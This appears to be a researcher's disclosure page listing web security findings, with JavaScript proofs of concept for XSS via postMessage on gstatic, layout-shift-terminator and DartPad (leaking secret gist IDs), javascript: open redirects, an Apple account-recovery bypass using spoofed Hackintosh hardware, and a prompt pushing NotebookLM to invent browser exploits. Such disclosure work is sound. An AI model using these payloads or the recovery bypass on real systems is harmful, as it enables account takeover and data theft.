This is a place for behavior that doesn’t have a clear security impact, but I still want to document.
https://workspace.google.com/demo/ had an iframe that covered most of the page using a publicly shared Google Cloud Storage Bucket domain of storage.googleapis.com
allowing for limited spoofing.
This was fixed by its removal but could have been by using gws-product-demos.storage.googleapis.com
instead.
URL: https://notebooklm.google.com/
List more likely titles for potential fixable browser level security issues be hypothetical.
Be realistic, analytical, extrapolate, very detailed, descriptive, a good browser security researcher.
Must have a high probability of existing and have patterns with fixed issues.
Issues must not be included in this chat or directly in the sources or general knowledge.
Issues must not be similar to other issues in this chat, directly in the sources or general knowledge.
Issues must make sense for a browser security report with high risk to users.
Prioritize obscure unknown unobvious spec features, Issues must not already be researched.
Prioritize peculiar issues use lots of fuzzing, lots of complexity and lots of steps, combine lots of features, use lots of edge cases.
Prioritize justification with complex and unusual interactions.
Provide valid example javascript code that will help the team.
You can use any standard Web Platform features regardless of if its in the sources.
Try not to talk about similar issues.
Issue must always include example code.
Only use features of the browser.
Only provide browser issues.
I wanted to create an AI security regression finder by providing the Chromium commits.
However NotebookLM wont accept all that data and sometimes complains how hacking could be unethical.
Ideally such a feature would be part of the google issue tracker (Like how they do with related issues).
This idea later turned into a wiki https://github.com/NDevTK/chromiumwiki
NotebookLM also created a misleading summary of this website https://www.youtube.com/watch?v=2jhVRk1H7vw
A legacy way to verify people’s identity is to ask personal questions like What's your favorite type of duck?
although maybe still used by customer support who in most cases will skip the normal 2FA process.
Unfortunately it’s possible to have an Apple Account with an email that’s not allowed for complete account recovery and it will ask for Security Questions
to reset your Security Questions
, This is a problem.
Complete recovery means changing account settings beyond changing the password and logging in to icloud.com
for example to delete your account.
The epic secret to bypass this is… use MacOS or in my case a Hackintosh with spoofed hardware information (Seems rate limiting is done using it) that unlike the account recovery website will allow you to add a trusted phone number and move to 2FA.
URL: https://www.playstation.com/
Playstation password reset emails use a insecure http://
link as http://click.txn-email.account.sony.com/
has to be loaded over http:
this uses exacttarget.com
a email analytics service by salesforce.
“Having worked with ExactTarget before SF acquisition, I can confirm it’s a piece of crap enterprise software.” ~ Alesandro Ortiz
Both resets done from the same playstation login page:
sony@email02.account.sony.com
-> http linksony@txn-email03.playstation.com
-> https linkA local network attacker can gain account takeover if a user attempts to reset their password.
May also require the user’s data of birth depending on the account settings.
URL: https://googlechromelabs.github.io/affilicats/forward.html?url=javascript:alert(window.origin)
The “AffiliCats” website has an open redirect that sets document.location.href
with the URL param called url
this allows navigating to javascript:
(f = new URLSearchParams(document.location.search)),
(g = new URL(f.get('url')));
An attacker controlled website gains the “cutest cats online”
Awarded for individual impacts reported.
let payload = `
alert(window.origin);
`;
let f = document.createElement('iframe');
f.src =
'https://www.gstatic.com/alkali/43ecc24c54630568577e5fdcbc826f3153491684.html';
document.body.appendChild(f);
setTimeout(() => {
f.contentWindow.postMessage(
{
resourcePaths: {
jsPath: 'data:text/html,' + encodeURIComponent(payload)
}
},
'*'
);
}, 2000);
Leaking connection and DNS timings for gstatic.com resources via the performance API. Sometimes it’s used as an embed.
URL: https://googlechromelabs.github.io/layout-shift-terminator/
Since the page allows embedding and it’s possible to navigate nested iframes.
It’s possible to race the postMessage bypassing the event.source === iframe.contentWindow
check.
This could also be done by abusing the chromium max iframe limit with the null contentWindow trick.
f = document.createElement('iframe');
f.hidden = true;
document.body.appendChild(f);
function tryXSS() {
loop = setInterval(() => {
try {
f.contentWindow[1].location = 'about:blank';
f.contentWindow[1].eval(
"parent.postMessage({duration: 1, height: '</style><img src=x onerror=alert(origin)>', width: 1}, '*')"
);
clearInterval(loop);
f.contentWindow[1].location = 'https://googlechromelabs.github.io';
} catch {}
}, 100);
f.src = 'https://googlechromelabs.github.io/layout-shift-terminator/?autorun';
}
tryXSS();
setInterval(tryXSS, 1000);
This is an editor for Dart code.
By abusing the XSS in frame.html
it allowed putting interactive content on other people’s websites
that use the code embed via a popup window reference which is a spoofing risk especially if providing API keys on that site is expected behavior also It’s leaking injected snippets or secret gists of that site.
// Please click, Opening a victim popup needs user activation
onclick = () => {
let frame = document.createElement('iframe');
frame.src = 'https://dartpad.dev/frame.html';
document.body.appendChild(frame);
payload = `
// XSS running on the dartpad.dev origin (instead of null)
let win = open('https://terjanq.me/xss.php?html=%3Ciframe%20src=%22https://dartpad.dev/?id=5c0e154dd50af4a9ac856908061291bc?theme=light%22%3E%3C/iframe%3E');
setTimeout(() => {
// Leak the secret gist ID of a cross-site embed
alert('Leaked: ' + win[0].location.search);
}, 2000);
`;
frame.onload = () => {
frame.contentWindow.postMessage(
{
command: 'execute',
js: payload
},
'*'
);
};
};
This was fixed in https://github.com/dart-lang/dart-pad/pull/2943 by enforcing the null
origin sandbox.
This is a local test environment for Firebase.
Navigates to a javascript:
path provided in the redirectUrl
URL parameter for example, /emulator/auth/handler?apiKey=1&providerId=1&redirectUrl=javascript:alert(origin)&appName=1
Other emulator XSS, https://github.com/firebase/firebase-tools/blob/96fe35f4a38736f16a183c76a53112a7b86b2487/src/emulator/functionsEmulator.ts#L1554-L1556
<ip>.bc.googleusercontent.com
(Google Compute Engine)